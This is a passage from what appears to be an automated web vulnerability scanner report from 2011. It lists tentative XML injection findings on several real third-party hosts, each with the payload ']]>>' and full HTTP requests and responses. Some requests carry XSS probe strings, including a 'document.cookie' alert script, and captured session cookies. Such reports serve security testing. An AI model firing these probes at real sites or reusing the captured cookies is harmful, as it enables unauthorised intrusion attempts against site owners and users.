Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSwsDQ0Mza1rASUAFEE%253D; myPAL=eJx90D0TwiAMgOH%252F0qwMSQoE6FR18c46aPW6Ojo7qv%252Fd0Ert0HPj4OHl45Ziet4TNo%252FEkiqyPkKMkYDQAnqEXgedznDV3BNl5jMT92WCgEjKBIviOTartVitzI6x4ICDqyWaGll0E1s3VttNb%252FbHqzl1g9keOtPuhrzTzgcE%252BXOA%252B7GwYGFifWFeGYUlY0SwwUNeldUI4RS5lEjIbIqUD5Ra38BwZrR67xdS1bw%252F4wdQXA%253D%253D; BFF=eJytksFugzAQRP%252BFL7C9kMXmkjQ9BClQKThRe6o45pxjmn%252FPQoGs0fpAxHVmdtbWvtYZcPeb08olXqu02lprTVJcnU5zLMgAl1RftT8cf34vZVP6pGgdRGc2lmayQWdSkAVm2E5HxSowIzn9l5nSNew%252B%252FNbkGaAdXtgZ0OtMGJOgDGI2M8r6IlaQLiTFilP1LVaQLiQ1%252FReNYIjd%252B2MldpMuJMWK3afQDb3Ok2Y8SLAOAyuoQXZGzzHJXyf3TBprZicLrWBDzjacIxvOsSxwg8KNUSl9%252BU%252Fpzt0M7sjiy%252BWGmYz5DE7OJD5kqntYI1RHGV6O7HJCVwRyOX8r47YyW%252B%252BCFOPl8QSq6EMG; TFF=eJydlEuOgzAMQO%252FSE9hOgu2w4RizZcFipO5mdlXvPobSUMXpKHSBEkXvxR8McybJt5%252BMlC8IcYIBJlWlyzhnyrfvjKM9UdgW2LaDjnfH48qHiid7YuVx0foMWyFWpOzk4O9evpbr%252FLvUd%252BtuELbKYJgAsFU2p8Lb1vN12Ru%252FBsLK46L1GbYydN695kQxvatBjhrkwceDJ0mBtW6Xj%252BRNVA1Mn5gBiDn1mlzEPsPOYurN6jnE0h56OXhp8C4j8XHkdejFDf07Y3unAFOU4f9I5EPtXqdihwC9tz8bgHCuYTt%252FtmGmnWkYcrA5oWZmevDa4F1m6uOU%252F9dD6zPWDzl0kfc%252F%252B2Zmpg%253D%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:16:20 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.10. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.11. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMTI2LDIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTI1Jm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=149c9c261f7ed36bad90adb9004f3768 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.12. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/cssbin/www-embed-vflPrzZNL.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:18 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.13. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/cssbin/www-embed-vflPrzZNL.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:18 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.14. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/jsbin/www-embed-vfl4nNnFQ.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:20 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.15. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/jsbin/www-embed-vfl4nNnFQ.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:21 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.16. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://urlwww--feedzilla--com.rtrk.com
Path:   /tools/hcc.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tools]]>>/hcc.asp?callback=jsonp1296748868891&widgetId=2130113621124&widgetType=flash&hostUrl=http%3A%2F%2Fgsbmtg1-px.rtrk.com%2Fhome.html HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:44:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/
X-RL-Host: pweb108
X-Robots-Tag: noindex,nofollow
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d1; domain=.rtrk.com; path=/
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Type: text/html; Charset=iso-8859-1
Cache-control: private
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: country=us;expires=Sat, 05-Mar-2011 17:44:40 GMT;path=/
Set-Cookie: ASPSESSIONIDQCDCDQCR=LBBJEDMACJOOEFNDAOEPBPEH;path=/
Vary: Accept-Encoding
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 18:13:32 GMT;path=/;httponly
Content-Length: 26908


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o
...[SNIP]...

8.17. http://urlwww--feedzilla--com.rtrk.com/tools/swfobject.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://urlwww--feedzilla--com.rtrk.com
Path:   /tools/swfobject.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tools]]>>/swfobject.js HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:32:08 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/
X-RL-Host: pweb104
X-Robots-Tag: noindex,nofollow
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Type: text/html; Charset=iso-8859-1
Cache-control: private
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: country=us;expires=Sat, 05-Mar-2011 16:32:08 GMT;path=/
Set-Cookie: ASPSESSIONIDQCDCDQCR=GFEBEDMALANMGCGFKICELPGM;path=/
Vary: Accept-Encoding
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:00:50 GMT;path=/;httponly
Content-Length: 27265


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o
...[SNIP]...

8.18. http://weather.weatherbug.com/ [zip parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The zip parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the zip parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /?zip=75201]]>>&zcode=6292 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="NON DSP COR NID"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=UTF-8
Content-Length: 49365
Expires: Thu, 03 Feb 2011 16:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:34:33 GMT
Connection: close
Set-Cookie: wxbug_cookie1=lang_id=en-US&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Local and
...[SNIP]...
<?xml version="1.0"?>
...[SNIP]...

8.19. http://www.myfinances.com/solo [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>?module=facebook/login&message_num=2 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

